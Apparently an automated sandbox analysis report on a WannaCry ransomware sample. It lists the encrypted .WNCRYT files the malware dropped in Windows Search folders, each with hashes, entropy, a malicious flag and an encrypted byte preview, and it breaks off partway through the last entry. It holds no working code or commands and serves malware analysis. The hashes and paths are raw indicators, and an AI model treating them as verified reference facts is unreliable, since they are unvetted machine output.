                                                  Preview:WANACRY!....j=.......Ry.gt...x....f..O....P....f(......W.".v._!...d.....$r|....}.6.^..N8.@"(9.Rt...R.l..4a?`.3T,9...)...k...^....41..l...p.y.z.......J.8}..)?.{..%*.../..IV@....F......*....>Rso.)....i.b.!.[Q....MC.b.i....#.S%O...!..kS..)).h...+..@.].zR.D.....(D.......x..x+.M.>.2&W......}..1V.O.x.!.s.N.J....W..&....&.~l.v...<..g<...z......[..z.P9i....!.i.1|m.@kK^.4..K"./.`....x.>..<..:..^z.i.....E.T...7...T..{.E.....+..7)@..Yi`.DjBl.....p..Kev....<a...q.,....'._.o.A........J.<F...#.P..5....U..BMg..I..2..FXj.qV.......8..fj9....(+..Q<8.?}.+...I5..#...0hv.......sp!.T.<x>..!x....... wNZ.D....t..).u.^....?....$\.DU./..../....%y...(..6..g.............W ..b..T....... R...94.".."b..&..`....vi.ubE....D...*..X.*.].X......m.b...._HUu'$.T9...............'...L.{..#r.R...{a?CG...l<G..o.g.j.y..{.wV.;4R....R:...,.|..V..5..K.d...z.*....Z.B.&.. ...,.......z.&^....m...lwC....a.......<.f.*.Dvg.f...hak()........2%..F..|/q,t.K.B..h.=F.2.).z5.=`.3/).b.....y......

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):73912
                                                  Entropy (8bit):7.997634603993111
                                                  Encrypted:true
                                                  SSDEEP:1536:YZmu5Z1oFfSml7elrtVelsBl2qqwdUlZ8wysjXB:YZmu5Dgl7uuCf2Bhywx
                                                  MD5:325F6DFDD80291D7504E1E5326631282
                                                  SHA1:993ADD0C459A6EFD8AA9996534539B6A92551536
                                                  SHA-256:916FEFC7EA16850150658C558C256BFC0B99EACAEB5FC43FC04F2B5B8E7AB452
                                                  SHA-512:A18FF0F88FECE018C0ECD5E3E3205BA79C19E8092002955428F04EA860A228083FFCECB1FBA46FA5CA7D262083103966564F3A19CF7015774C16C9B070064540
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......2H...x..O......:.Y..Z7..{..U..F.....|<A..c....NG.:.o&...[UN..O..n ...W.g.....#U?....{.i....F.#Q.x._...u.W..%.z.9...T...6.K7A.`.57./v.....n%...\...)C...w.P.k=..]....zvQ.._...0N.Z..}*c,|S....Ma.iG..9.m..yz........E.o...#.E...;..v....6.....i..`................4s[.t..6;..ON...}.i.....S..jE...P.}..7<#e..O..j~...?.'..._6.L...~..s..Z....5.......A3p..r[..`_v8n.j.............4....fg.($..5v.y&..sb..D....w.......N.2.n..d.U.K...........c0..x.D.t...Ba.7.`$l!....1.1.@yf.%.`zj..fj.....#..T.v....O..b....\O.~t}...S.'.G..&Y5..&[...d...&......#...{.z6...q.UHi.mX\.'H.O.*[.^.~..3....I...>D.....:..U.E.;.p.....K.t.kL.......)..S.L..i...2.oCR.ORbu.....<.@...1..-...I.....{O....g.u..y..~.D..4.....^..J1.D....K..NZ.[...>..Q...?...P...rtA....+.R.a.j.c....y1.$.....9d...;.. ....rI{=b......`..].5....r_./...<7q.o=a.@.'..e'.....J.....}..h4.].e.....8ZQ.#.p.}......T....z....JP.L...4.q.....r.e.........R..K.......~O.$....!..c.D.<W...A.@.a..{L).5n..P.i34....Sn...c

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19336
                                                  Entropy (8bit):7.989214822925728
                                                  Encrypted:false
                                                  SSDEEP:384:SFg+iG6GVRNzKwrhMJMckmIz418YZAxIJnnNfpvXpGSsSLxVk5:SFn6mrjfckmxv+xIln59XpGxSVVm
                                                  MD5:9EC19256A9E8224DC0F10EEEF316451C
                                                  SHA1:FCF0A5EB2ED33E544CD75E9C060A3A9CD0E91D63
                                                  SHA-256:CA7567E19F6151353CBB1E357FB5E4B15A46C84CA9BEED4CD6DAB4EBDE422D2A
                                                  SHA-512:A999300111B573461CF891E3E07E7E49A9BB028CC25380E72EA2F63A6115F723996BBD750A23DAD99E7F9034BA0FF3856BD6575D596B77401BCAD436551283DF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....p...........eh.q..x........(7.]...)B%...5J1.........0..i`4...=... ..5k?.[_.lT#....~t.j.8....-no."..J.....C.A.Rq$$..[...c..t..+.".{...Bw.l..GJ4..W`.c.D.O.rQ.;.5=...n.Vp....H..m,.Fi..J~.t....JtT.\...!A...>l.......@v..p.q...\.........7.#h..G.%8..'.V>....pJ......E6w.;.....>.....U.2.bxD.O...h.G..`..M.l........k,.Dt..M|.7...._.+.*..TI.!....}{[...qA.r>b...M..-6..f.$O.y=M!R.f...7..T......7U.........1.S.f.BA..S~.%.s2.c.Q.S95I_.x...t7m.(`.........2./.bM...(..D.......{-4jI...&-5.S..d..4w....,.'\...-%...x...eAh...N"Eo.......$lG;...f..6Eu....L..N....3$..g...v.z...7.......=\...#...o......y3..v;/g.7.f.Y.*..GJ...j....V..z....^G..2J....*o.tD.L...v...=.....].-.$? }]./.c...+.f.D...]T.+...In.....P$...GC~!...o..X3.......-XM..,..-.../......8\...s.....ys.<c_8..^t|.....V=.*@n....*.<.N..4R.....-.`.K.L..yq.Lr.?.X....a....q..h@.>.w.bh..\Y.(.x..Tg1e....>..(....d.!U(........<..EH..y1.4..."..c....6.Y&....d.E.....W0,.^....tL!......^../O....^.[.............#.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20680
                                                  Entropy (8bit):7.990892039491002
                                                  Encrypted:true
                                                  SSDEEP:384:CqbA+pTJolp3R8/pmZt0ylH8pzh1ktVSGJ3dP6DBBKX2YGFnPFo8T/D:CYPk1RAmZvcnatVSuKXdF9jD
                                                  MD5:5A1CF04A16C3433E66D9B2B059C49277
                                                  SHA1:D74925C1EA6E87ACCF5CEBEE30D4D17E2AFA0129
                                                  SHA-256:FE8AF96F61EA775F1B2FB34E49B58F1AF7C920A0391FEBA2244ACA88B36AAF5C
                                                  SHA-512:5E604BF3E0F0A5AF271A1FF6AC0892E10CBAB476252C248D10BF949DA95E9B0BA4F477660FB8DA0F163028E17DF832614D1AFEB9B68D9112272A04CAABDF9197
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......SB,.p..~...y.N{.7.w..%.....t.x..0...o...Z.c...w)#.....,R.M.~..WC..../d...K'.=.Z.N.h.\....d...*=..`.]y...gA...*..f.....H..d....t!.fbi...F3&h.%....%|D1...u....P....... ...]a.|OD..#.c.b.V..94..h..@.=...~...J..,.m./..Zg..DH.y`@<*..7.q..w..&V....9......O......._x.p.*...Yy........|...5.1(1....DS.o8J-....=......]H.U#....Fm.*...+....n.o..Fu.x..X..@)...I..".Z8..O.....4x7...t2...%......?.b..}......N...p.......).BTG.O.....`@,..9.6W.C..B.f.6..p..N..u.{K6....eK<.5S.\.....ac|....6..X9.....n7..._-....;.r.'.Y.!u..N..J....X`}.-i.[..]..ac.%Gh.`<q....v.(.%....}...<....9~.....gOu..~{.p.=3Fo.f.$I}........=.{..3..0/.#O.F.......z...M.Xc.....J|.Xl..3.B1|t1.">.,.F/^I..)...)>Hw=..gS.E.(.n.!.@...T#.).Gk.Q.i...&.o...."&$..K..u.q{.....n...5.h.u^.V.p.m.).Ah,.%....r8..%.t|.......o....?W.ld.'>y...E..'.....n.1.-.'...8.p..>H..w.x}.H...\..7T.!.......5.j.`...^.../...1...E2.cE.r.I...9X..<..:...T.o..~Izl.......oU............6M..&,.1}t..w......f..}...\`..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_5[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1608
                                                  Entropy (8bit):7.889873012852417
                                                  Encrypted:false
                                                  SSDEEP:24:bkG2IEEKiFGDwxarC4hddYzyR2SOZ4VM5WNlhl4Cbij1qanUOzkq6uUpFF1xX6ei:bkd608x4CcfOy544fXijEduUlLXKFEB6
                                                  MD5:0FA9E78ED5A1254DB8FE32C6A0E71F32
                                                  SHA1:DCF76903C4ECB0BBEA2E17336F1D629EA52DC8FE
                                                  SHA-256:DD8E0649A7D51C1A219D6270099AC945992E8CFF6F88150559D09C7BBF0EEA9D
                                                  SHA-512:53E895445C37C283953680B55E7CF1036A1F122A592DAE01EFFDFC5FA85FEC4B55E3A2B4D322ABC4D2134D58CE8275D4AEE9DD91E9812136FCA1DB465295093B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......[...Bx.R....d..8...~>G...t....K?...D=J~..\.R.........r.u*...vzIr.4.2.%..'y...M..$!.$.![P.T'..x....4I+..C.*q.....}.e.G..8......#.....0.......$.}.....,.:..s. W+...>....(......\...s,j.Wv..m.-.3.~n.!...3....q..;.|..w...5. ...P...T.*...+..k.s.......$........F\.s./..h.]N.......Dg.=.p......9....N`.ua^..mo....pc_.kD...]i.-.....<......v.. ...}.D[...Fx5. ..^2...b.....S*..........I.......x816+....lg4.M.t...8..C.o..2.4(.g.$lE%[.........r:.V..........J/.Z"....Nk...m.9p2....@...s...Zy..rql."...J.....u.R.N..u.R.......L....;...u_....'...1....+.@.`&g.`.QJ~.$... 2......V.........E.MKm.S...c.Rx...@..6k....It.h..m.....b....n...`o...O.....&..\....F.q..f.>/..b..l:.....f.......}..~]....S.r.1......s.x.D.&N.ZD.fP.c`.,..c..Y...j,(..H...^.....1.1i.<*...GV(.....d.5(st......b.YD....O$.X...6,.H<n.5..;_....).C....6,&.R......y..\....-..._|.......I&).ukS.:.'..o..O_..>K....a../V5.....b...hW..1U.^.Pd.d.K~.1z.....:tA%.K....E...X..C@..W?..."....0....

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37464
                                                  Entropy (8bit):7.99534123291725
                                                  Encrypted:true
                                                  SSDEEP:768:pJu+ugR70rvI3aZpfQGzdFIu3mWI8tJF2ALie2hXWOvLeZKnb49IF+M:bu+3xupfQGzdFIEmeF2Aue+vLIg44D
                                                  MD5:575F5877D801483560D58A753B1A2101
                                                  SHA1:47D1A6255C97F1D3F6212C2028843AB06D0E8C3F
                                                  SHA-256:CB93626EAD1791CA5759C0F0FF1C6E1F789EB584137C0317901365A2B1A9E8F2
                                                  SHA-512:EF15A65F5F5CD1C8C1DEF3A698B602F27B94ADA497FF950FC12A489E22743A6CB976099AEF94FDF0A1142093A865DEBC7C3ACEEC37A8D55710E744763CEED892
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......90.".+MG."..7...IA"K.I.!...8......5.U...y.....X.0o.r...Y.\..L..[..$JF...\.JO.E._i...C..i.D......9d..^.S.%..4.^.Yi....Y..M...9......J..D.o#.c.JZ."..XB.I.;~8..2..M|.......W>@../.E..."6x..p......u.w9..mv.2.u|T..y.......J<;.F0...j.e....|..(...Pt...k......=........oi....^.v..q=..@.}...q....nEK....O.R...(6^.pN5p\ .=/.....v.k.~..psa.]zy~......E..,.6b....$.C!.H.$D...'{.2..juC.P........WE....m...:.G......m.`c.......X..U....F.B.K...>....B...!.A.:...%{.)W^.G..3.....JaX.....I.*S....r........].HB..`..@.E.T.J.H`y...S..^.KH...y.a@0..9..2.H..........<..-p.F...=...(6...t.i!c..:*..,*...c...e...(.O.7._~_AuI?./...|.>.`.R.G*. .V.=.1F>S\`.... .6..Rn.'.AV..m..Q...Qmy.<.K..I3.fN5+....Z..`......r.z{.N...?..Tks....F.D\.H9^.X.....+..BUu.hw.r..?.f.@..%.+..[.L.+C....M...).>}.....y......k4G..$B.`.......n.3......,.c....g.B.B.KMmT4.f....6.h...*.^.7._9.x........t..+.y...2~z..._`?.P..z..~....t...;..A...Xz.-.....h...... ..1..z-..a.,......x.nt.......~,.Ap7d...W}

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):168968
                                                  Entropy (8bit):7.998861858012997
                                                  Encrypted:true
                                                  SSDEEP:3072:Q5CSHSy96gGE6U1EgSbDWwXqPuwz15YhcBVHWsGUTKM7MzmE:QUSHL62E1b6uqWFhcnW9JM7MiE
                                                  MD5:FA7ECE6E695E467C30FD27BB60DFAB4B
                                                  SHA1:E1D72D012D67058D89D2E5E3E35A2063FCF5C8D5
                                                  SHA-256:BC9E1ED1C2431E88F60FE0FA0F5D3B48DD9DEB512C9F0C5A10E963D2CC2593FA
                                                  SHA-512:285F9E6B364FF63B21E0F6369CF480B7B70C7727E13D112269B8F4FE7510FCEB1FEE7D993A00152052B2249893BDE1EC83BEBACDF01BC91B355769109E7EBB77
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......q....m.......b.Z.i.R..u...`l..x....y.H^*.........Q........)....NZlP...o...?....p....H;s^.....%.....w..i.t.Q..+..]..Ot..?..040....C..a......i...aD.L#.l....b.(.V.!D.G.R'..\:+.8....."..n.yy.-=.[.bWA3.o...F<9s`.Lk.}G.b,..Px.|.Go..;Pk.Y.6Q...............W......~.....O..... .f.6:..r6..B.h...1MSi31..Kg\r...dJ.w.Z!.6.<.,.....{h?K...Z...%6.Y.i.)lk..T...y..3._.h.&.:OJ.3. .*...;.b..j4......=8.M."]..c!w.1..vo.g.~..k.@....-.#.a..P..z..SN...0.!....Z}Z[......P ....I..%....(!%.f..PN..~c....O.&.<.....$...7k.{.:...L..1C.KM....M.....A..D.P...p...h.........Z.g{v.>...<>......%F7M.).U~.z.g>$0.(h.~.a..|u*....m.c+_....31G...#.:^.~vh..IX..r$G.~....~.<.ka.r..0d..!...C..M..[|....I.?.&.Sw.......p..(3....S.......[j.....E.''.?.'...I..he\P.z.#.1..2.....Qn..`~O......3.#.H.-`..lB.. .9.f.K.f.....P#..MB..<fL.b.^y4.U.Q..9..ra1....k......t...Af2..y......}.[...G&(.9.8..}j..-.7[.R.[:...al..R..dG~Tb?Q.)PzwW..............P).4.........5..%j'...a..3.kZ.......D.H.%..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):51224
                                                  Entropy (8bit):7.996723736114971
                                                  Encrypted:true
                                                  SSDEEP:1536:E7R57u1znHt/KUS1P8mibeFZWGPgOFfi67WFDdhO:Y57qzHtRSybYQGNfWFDfO
                                                  MD5:D2A69098216F1E7CB56EFEDD22994078
                                                  SHA1:CCA5FA954B1854F2881283F1CB9827591416C2CC
                                                  SHA-256:32AC09FC100F5209C748052BB8F505E6854907C104852BE933C9E7F4BD105080
                                                  SHA-512:C9E637A4A4389CDF6A0B1E05FEBC9D9123EE7126B6219B578D26CA0B56F43C99275AB64248560216B75D9329C363AE113195B0732A0668C668DEABBC22762C53
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......-.-.lOE...R.I...~<.O.e?<...D..+...S$..............X.*.C.\.^.....B#.....).qq...l.i.B.d..X..X.......N.R?2.p ~.,...[...C.9.<....A.Y.....G1.BM'ko'.D..Y.L.z..... G...y.....c.W...*...<.[..i.h...{_.^.. e.G\6....j-...*.fL.5..H@..t..i..^&.......J............&."e.......V..570.../p.......F....r...."::.b.T.;.p0.A[.EO^l....@.W...P..a....v...i..D\Z.0..|..k.L9......a.......*...m......SF+iHC\(:4%i.....2c...6Z...fRdg.:.h..m..W......WBU.Ut.>0U...t@=U.S...q.%.Be.J.k.........s.o0...=...T,...T..f.:.?..|W.6..WH..$.5.wI).07.N.p...p.rS.#p..j..c..P.'.._.!`.\...:.....)0u?B.:..r.Vi...APA.... .3.y...F.85m..kF.|.......@..4.VoW.b..EG.O~U......].u@.x...zz.......j.W.k.}B.V...>\..v.`.M#.....\......t..`.Y...l.x....1..RL../p..H_....G......4..z......Pa...'.cl....DJ...=.U.t.9.....U.:.0.......DI..]j.z..+k\.:.......<.)Z.n{.t.{.'.@.f..Gz\....=..uf.......mh...`.....2.?T..W..:..{......:..Z+.A]...S..\Q..?......'o..,....#..b..`..5@..q j1x....h.ky.N.O....i......

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):69016
                                                  Entropy (8bit):7.9971435479437964
                                                  Encrypted:true
                                                  SSDEEP:1536:IEHB0qJ7/1yx73Ka8vAnCpSFhgPkmBRzKKpQh2CBe3j:PHeM7etngPN6KpFCBe3j
                                                  MD5:A54F8542CDD6E107C8CA1ED474E5D21E
                                                  SHA1:5417D163CCD916463A93512DF9984A57C15DD98C
                                                  SHA-256:2D8959B5644CAFE23F381D7A187F24EA63BC69AB04071C42849CAE907303CF60
                                                  SHA-512:2C84AE9E4151B41690B785BD80321E6B37DA1E8C1D7472470B0DEAFED3C9F353FECBA2EFCB41831787952F3903549B9CD33D460D0776CDC2BF3C709389E342CE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....U%vW........*.. r/..:.\O.]0.|..g.TW.x:./. ...k.`|.r+..p{....Q...fp.QTo..R..o$m...{m..8.i.d.S.yrme.....h.=..b.5.2.C.j......{.Gl......r...h.d...qQ".t*_.bM|..). L.i....I....w.P9..?).e..y..............3O.x..)..-...A_C.;..A{.w=....yd ...&.C4..!.......t........Y..ix_..a.4*..^.U....bSHL.8]!..3...R.L.!...AI..u_....E......T..=..q..!..{.n[ivL.....!.m.........L9...V.h.>..2...u_.sh.i.+..Iz.......v.[..b.w.@.*C..I.l...[as+....+7...yc..!.|X..:....;...N.|..U..W.]5...(...W<.1....I....t...*..I.l.?4..z"...3=...=..rRQ.....1t...+......HO-.e......n.0.......r..,.1 ..M$VH....z.G..Q.......':......>.yw1...Ak...).....~....K.t...y"K...I.......a..k..Q..z...t[....-..m-._.fV..s..@.....7.Bo\...j.........2....u.lu...\....H..e...V..[:....7C.5.6.x.'D.ynh$.,.X)...O.E.,`]t.j..L..........$........5..X<...3Q|4.0%..ZHe.........V.$f$...eq..=.B....e...s.4....Q`.&.~?.6.....0x.Q.=1..q'.#.....D...)WpW ...Fr....=...{...A.../...!..5..".......1.....i..O.Y..L..d..W9..".8TI.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1573144
                                                  Entropy (8bit):7.999879241096762
                                                  Encrypted:true
                                                  SSDEEP:24576:W8uWKgJdHNGb0uAXu9u7koGAkcT+1FR3eHTlt9Zrt1KFhOJN5omWmpvB:WBg3SdPIkAkPFs5ZrtAOJvXWG
                                                  MD5:10FCBCB268B1339DE976DBAF1E12CE6B
                                                  SHA1:A2F1D696FC4E898B94D65ED884149C6931732B62
                                                  SHA-256:0F3C0044F94B035FE8F69E0FC738799213B597A1BB38B3793C1E800AA2B95946
                                                  SHA-512:3AC4B8D4289C93A4F4C3DFDD9B2375ABE05785AF37D3ABE97ACDA83AF3020FBFCB62B16461F55B6BC5D0DF254510D6884F2C4A79065F52EAF0F70868F6350239
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....Wh..Rh;).....h..!!o........e...pY.,.)7....#d.A..bV.@jFL.4....-.^.-.3&..<)&.]...5t.!+..a.....Qk...4l.r............D.s.u..^.vFY.`z%-...'....w........;.].{:.*.@...yD.8...X.X.........._......o...P..n...V.E.....az...m...#U......w..DwA...,..2.................a^.V0..Zn.......3.......m.....lS.W...pB...._Qm=...NM....9]u.......x}+..0...........>.Z..L.-i.u.D.&B^.+.q-..I.xN....iu....,M.w.b..f....g..... |.o...[.x..DGa\..{X3...<g...u.N.. .W.<..........e...J....hl..m5q..c.RKn.!..u..>.......D.....Bvr.h.1.ZHv.E.....hdmn..P./.(.9..i'..%.A..9.....{..`a(.c2.,Yy....$....M...~...Tw..ta0.R..^3....:..S....:............d..._v6..h.]....D....$....J.2Th.s.w...3.z..).......JDB.W.64k..(1*...".%B.<..&`?.gI......,....j..S .....h...#.G..A.bI....LO.P..kh#.ow.....W..~..aK.t<....F.5.....}..'....eKl^..TmQ2y.p.1.r..?cdW...c6...L.v.5....m(..`..~.Z5.k!.....s....(........O..n..w.6.;..[ph...J9..Q.....W$...J.X,nS..v5.P.......s...g..Xy._............X$...pf7.(<.5..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2097432
                                                  Entropy (8bit):7.999919868643498
                                                  Encrypted:true
                                                  SSDEEP:49152:a52IdkjJVA55CEPRkIE1iRqEIoEhiY46wKk0rJk:a355fZUnEjOiV/
                                                  MD5:CE521104C93E2F4FD41C5E2855FC938A
                                                  SHA1:1B14832F10EE8B531BC05C8D1B6248D1102BA5CB
                                                  SHA-256:FE069DE726E7F3B1A2053443EA6CFAD95338EEE225B47FD4FCD63579A87995C5
                                                  SHA-512:89821E4EC593B8E2135A08127C9A757592E26B0D3D2F91BD9146720A04F0A3AB01A1F9C303434697A627718BBAD5BAAB448E9E2B951E5A62600AA1FE079B913C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......![.p.0j|BO.n.8..._.....5a.s..A...=...@B..oCKp%.=....&.R.=.RQ.4.2I*X....Q.t9.U>.&v.S....l.".s.P.w.3F.T.Bm.m.D..e.t....w..0....>.....m.$.,..w..`n.nN.}.......(...3.!hm!......lz.E...v.......pC.1....@.3..8>{.b.I.g...[..MJ.....^...5..h..\.\)...... .......|.J.......+/fw...H....G.<...Ru~~|f..(..i.?>.k.h..@.x.;y.y6#......R.....9.....S.@`...a3u..=.S9..h.T......Ul\~.0=.).....1..u.Y.%..0\.}....I.h. ..m.....;...m\FG.A&..2W....a4...&q.Db>.^...<v...NsR..B..,..(H.b..... .fF...4.DpRG.=.!...G..w.jH.~c......qe&N..G../...5.Z1...u*,.u$f).+.M`..<..N......y....w..A.XU..8.&oB.....03?2.._._..;.6._.{.=>~..^.......464)L...N..,..j....Y....c.4..a^...........l2.Ea{...[.A..|4Q."...2..).-.-........:[...P\..Z...~..../.Z...K....t.9...4...I.-.O'...m...\.........V..r#.."..0J.t..5....*....D...Z.s4;~(...v.XN.a...^O.....\.$...W.;..._.M;..-...Tr...n*).=8YuVv....k....I...b.^"y.....^Q.^...5.(.r..P#...6..M89n:.Jf1.hB.Zav......0.A+>NKx.]....TK...H..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995360489278638
                                                  Encrypted:true
                                                  SSDEEP:768:mjgK6vmISu6FKeFaO7fAm8eHdg0d0HBAaZYNkUVoK20AGNlohn/Is:S56v96xNDAm8eHdgC0HLGqTK20JN2h/J
                                                  MD5:B17E17C57A30A5DB340CE8CCF77FF260
                                                  SHA1:836B0815496E755BD359A50AE7C6B25F2A3A2C82
                                                  SHA-256:1EA859E344F2F80395591B35522A74E3AD48BCCD2DC264962C2BF4EFFC391204
                                                  SHA-512:0D6E95564DC321847F36BAD896A28AD847C6C054B202F721C4173FDD66F1B8C008D8F76E843553912D84DECD3194782EBE4CDAAF40833AAA77CF1E45EF29A9C4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....\.S...&.V....bq.x`...L+.R.R...;...i.2..9...W...o.J.OKo..{>X._...K.g,....l.h.l.g+...#;.9.....V.yQ...r.LX.....y..e_..s;;.. ._D4n..HF.E..7|q6#.3..=..x.....e..$.>.+.v..*......f`..X.....[...(.....o...'...B..HG...+.u).|...w..y.^..8...o..h..:..y......v.......$.3F.k0..&..5...M.0.&..<.z.(W..J.0G9._.;../...4.1u..G\.8... P.P.h...P:7.2It^..:......ln(.!.a....2R4#N\......sQ.<=5@N.'.J...K...*+mU..a.:./..?VZ.L..p!...D/#...9...K.n...:a.l.D...(.c. .yQbg..+B(P.>D......9}X..$.>Kx.....0...x.v.p.+t.G[.. ..^Ndo..z-...LEq[.!..C...c2.6.,.aJ.k7X..n..~.;.>.@&.U...{...y.k..=3.d.9.a..C..TF.o.B.cP..j..H...Vz.....xo3:.-<\..+...X#@ ...k.H._....S=..#.[GGpnP~...m...s.+.._Wl.........0.}.3SZE.p...[..v.uJ%$..............T.\.gkC.$x.~.K..f......W....Wi...&z....].w..5.C...[..)3X..7.Y....+%...f.(...F.)........QI....3.NY..$b.g.F^.(..S.x(.?....9T.`=..~..s.a.H.!...~.>n34.....K....(O.=......GB..y....ro.~,.......-..X.._3..&........1.O9./f.kb+..a.V..\.c0|.|W..O..&j'B`w...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.125262859121263
                                                  Encrypted:false
                                                  SSDEEP:6:bkE2eLUBhudLjZdImOs9cmpWKhuyPhKH/jbbAS8P6:bkEHLU/6LFNXEwucYf7AY
                                                  MD5:0E0102EF30A8A09B19B29EB1794D2113
                                                  SHA1:718D2F0150681802C8E97B03143902B6FDD70E3E
                                                  SHA-256:B85ADEF49636CA2821D5F1F828277E398BBE87BE1E6F3FA980D72E2EF7F57BFD
                                                  SHA-512:45117BA1CC78EB4CAE66C1995DA4585F39D578949B952DB9C0A13A1492A03687934EC9224C7ABF87772A2FA40FDFBD0BA036083A70F438E773378350E4818B46
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....<..*i.S3.+k.2.............".....w..<..\...EH.....U,..}.....%"O..rM.}+...M..m.....1.^..V.kG$..3@......C.d......9<m.4.r....xG.,L....9.....h......4L...-pd...r.i.....#.`.k..... D.].jO*a.j..~./F{+r.t"..U.k.fR7x9.ksJd^.a...a.....xTQ.I.}..z,.....Lx..................j.rSS.1....8E...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.179284298179416
                                                  Encrypted:false
                                                  SSDEEP:6:bkELhPFOG06gtcVbNSeWhL/aLfN+B0X/cxHseMurUxrd85IxWiM:bkEFPFaebNo/lB0X+MDurUxZ85Ix9M
                                                  MD5:137145BF3D3DD5AE34E1DBABF60EC603
                                                  SHA1:8720690AC646DD29CFE1DDDD9CC9E8DDFB3261CC
                                                  SHA-256:294832BBD39AA7522AA4E0D40B5D95B61703C03EF2D88FA5BF3AF3F962A8B0DC
                                                  SHA-512:FC15C8515B562ED4E6C507B021B66FD48426A84DE8000E042050F796CBA8B292445572E163C94AD46B257DABDD909FE3A1E35EEFA34AABA01A1075BB6805F3FE
